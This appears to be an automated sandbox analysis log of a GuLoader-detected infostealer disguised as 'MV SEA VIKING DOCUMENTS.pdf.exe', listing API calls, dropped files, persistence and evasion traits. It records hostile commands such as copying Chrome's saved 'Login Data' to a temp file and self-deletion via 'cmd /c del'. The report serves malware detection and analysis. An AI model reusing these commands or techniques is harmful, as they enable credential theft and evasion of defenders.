      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202D10 NtQuerySystemInformation,LdrInitializeThunk,35_2_1F202D10
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,35_2_1F202DC0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202B10 NtAllocateVirtualMemory,LdrInitializeThunk,35_2_1F202B10
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202B90 NtFreeVirtualMemory,LdrInitializeThunk,35_2_1F202B90
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F2034E0 NtCreateMutant,LdrInitializeThunk,35_2_1F2034E0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202F30 NtOpenDirectoryObject,35_2_1F202F30
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202F00 NtCreateFile,35_2_1F202F00
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202FB0 NtSetValueKey,35_2_1F202FB0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202E00 NtQueueApcThread,35_2_1F202E00
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202E50 NtCreateSection,35_2_1F202E50
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202EB0 NtProtectVirtualMemory,35_2_1F202EB0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202E80 NtCreateProcessEx,35_2_1F202E80
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202EC0 NtQuerySection,35_2_1F202EC0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202ED0 NtResumeThread,35_2_1F202ED0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202D50 NtWriteVirtualMemory,35_2_1F202D50
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202DA0 NtReadVirtualMemory,35_2_1F202DA0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202C20 NtSetInformationFile,35_2_1F202C20
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202C30 NtMapViewOfSection,35_2_1F202C30
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F203C30 NtOpenProcessToken,35_2_1F203C30
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202C10 NtOpenProcess,35_2_1F202C10
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202C50 NtUnmapViewOfSection,35_2_1F202C50
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F203C90 NtOpenThread,35_2_1F203C90
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202CF0 NtDelayExecution,35_2_1F202CF0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202CD0 NtEnumerateKey,35_2_1F202CD0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202B20 NtQueryInformationProcess,35_2_1F202B20
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202B00 NtQueryValueKey,35_2_1F202B00
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202B80 NtCreateKey,35_2_1F202B80
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202BE0 NtQueryVirtualMemory,35_2_1F202BE0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202BC0 NtQueryInformationToken,35_2_1F202BC0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202A10 NtWriteFile,35_2_1F202A10
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202AA0 NtQueryInformationFile,35_2_1F202AA0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202A80 NtClose,35_2_1F202A80
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F202AC0 NtEnumerateValueKey,35_2_1F202AC0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F2029F0 NtReadFile,35_2_1F2029F0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F2029D0 NtWaitForSingleObject,35_2_1F2029D0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F2038D0 NtGetContextThread,35_2_1F2038D0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F204570 NtSuspendThread,35_2_1F204570
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F204260 NtSetContextThread,35_2_1F204260
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_0166F2C1 NtProtectVirtualMemory,35_2_0166F2C1
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_0167053D LoadLibraryA,NtProtectVirtualMemory,35_2_0167053D
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_0166ACCC NtAllocateVirtualMemory,35_2_0166ACCC
      Source: usp10.dll.0.drStatic PE information: No import functions for PE file found
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2797819742.000000001F470000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MV SEA VIKING DOCUMENTS.pdf.exe
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766276229.0000000001AA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs MV SEA VIKING DOCUMENTS.pdf.exe
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759455778.0000000001B04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs MV SEA VIKING DOCUMENTS.pdf.exe
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2764124806.00000000000D6000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs MV SEA VIKING DOCUMENTS.pdf.exe
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs MV SEA VIKING DOCUMENTS.pdf.exe
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MV SEA VIKING DOCUMENTS.pdf.exe
      Source: MV SEA VIKING DOCUMENTS.pdf.exeStatic PE information: invalid certificate
      Source: MV SEA VIKING DOCUMENTS.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/9@62/23
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: MV SEA VIKING DOCUMENTS.pdf.exeReversingLabs: Detection: 13%
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile read: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeProcess created: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe "C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe"
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeProcess created: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe "C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe"
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeProcess created: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe "C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe" Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe "C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe" Jump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeProcess created: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,30_2_0040352D
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,34_2_0040352D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsaCA18.tmpJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040498A
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8880:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8880:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:120:WilError_03
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\chkdsk.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      Source: MV SEA VIKING DOCUMENTS.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: chkdsk.pdbGCTL source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2764071041.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759317493.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: cliconfg.pdb source: cliconfg.dll.0.dr
      Source: Binary string: mshtml.pdb source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: raschapext.pdb source: raschapext.dll.0.dr
      Source: Binary string: raschapext.pdbGCTL source: raschapext.dll.0.dr
      Source: Binary string: chkdsk.pdb source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2764071041.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759317493.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.2763822074.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: MV SEA VIKING DOCUMENTS.pdf.exe, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.2763822074.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, shmhprg0nvltzt.exe, 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: usp10.pdb source: usp10.dll.0.dr
      Source: Binary string: ProvMigrate.pdb source: provmigrate.dll.0.dr
      Source: Binary string: mshtml.pdbUGP source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: cliconfg.pdbGCTL source: cliconfg.dll.0.dr
      Source: Binary string: ProvMigrate.pdbGCTL source: provmigrate.dll.0.dr
      Source: Binary string: usp10.pdbGCTL source: usp10.dll.0.dr

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000000.4671499105.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001E.00000002.4676824720.0000000002B50000.00000040.00000001.00040000.00000008.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.2299445190.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_714930C0 push eax; ret 0_2_714930EE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_02452A5E pushad ; retf 0000h0_2_02452A5F
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_02452A69 push ebp; retf 0000h0_2_02452A6A
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245501E push edi; ret 0_2_0245502E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_02452C80 push es; iretd 0_2_02452C98
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245557F pushad ; retn 0004h0_2_02455586
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245251D pushfd ; iretd 0_2_02452523
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D08CD push ecx; mov dword ptr [esp], ecx13_2_1F1D08D6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1A97A1 push es; iretd 13_2_1F1A97A8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1A21AD pushad ; retf 0004h13_2_1F1A223F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_053F97A1 push es; iretd 21_2_053F97A8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_053F21AD pushad ; retf 0004h21_2_053F223F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054208CD push ecx; mov dword ptr [esp], ecx21_2_054208D6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00876154 push edi; iretd 21_2_00876155
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088629B push esi; iretd 21_2_0088629C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088C482 push edi; ret 21_2_0088C484
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088B7D5 push eax; ret 21_2_0088B828
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088B88C push eax; ret 21_2_0088B892
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088B82B push eax; ret 21_2_0088B892
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088B822 push eax; ret 21_2_0088B828
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00888A41 pushfd ; iretd 21_2_00888A4C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00885B26 push ss; ret 21_2_00885B28
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088BC64 push ss; ret 21_2_0088BC65
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00885D08 push ds; ret 21_2_00885D14
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00885FCF push ecx; iretd 21_2_00885FD0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088AF62 push ebp; ret 21_2_0088AF67
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1C08CD push ecx; mov dword ptr [esp], ecx35_2_1F1C08D6
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_01662484 pushad ; retf 0000h35_2_01662485
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_0166248F push ebp; retf 0000h35_2_01662490
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_016626A6 push es; iretd 35_2_016626BE
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_01664A44 push edi; ret 35_2_01664A54
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_71491BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_71491BFF
      Source: cliconfg.dll.0.drStatic PE information: 0xBD736329 [Sat Sep 20 16:24:09 2070 UTC]
      Source: provmigrate.dll.0.drStatic PE information: section name: .didat
      Source: raschapext.dll.0.drStatic PE information: section name: .didat
      Source: usp10.dll.0.drStatic PE information: section name: .00cfg
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\cliconfg.dllJump to dropped file
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\usp10.dllJump to dropped file
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\provmigrate.dllJump to dropped file
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\raschapext.dllJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E6l40hhe\shmhprg0nvltzt.exeJump to dropped file
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeFile created: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dllJump to dropped file
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 33_2_00000244A22764B2 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW,33_2_00000244A22764B2
      Source: C:\Windows\SysWOW64\chkdsk.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1BIHHVSHQZC
      Source: C:\Windows\SysWOW64\chkdsk.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1BIHHVSHQZC

      Hooking and other Techniques for Hiding and Protection

      barindex
      Self deletion via cmd delete
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: /c del "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: /c del "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
      Uses an obfuscated file name to hide its real file extension (double extension)
      Source: Possible double extension: pdf.exeStatic PE information: MV SEA VIKING DOCUMENTS.pdf.exe
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
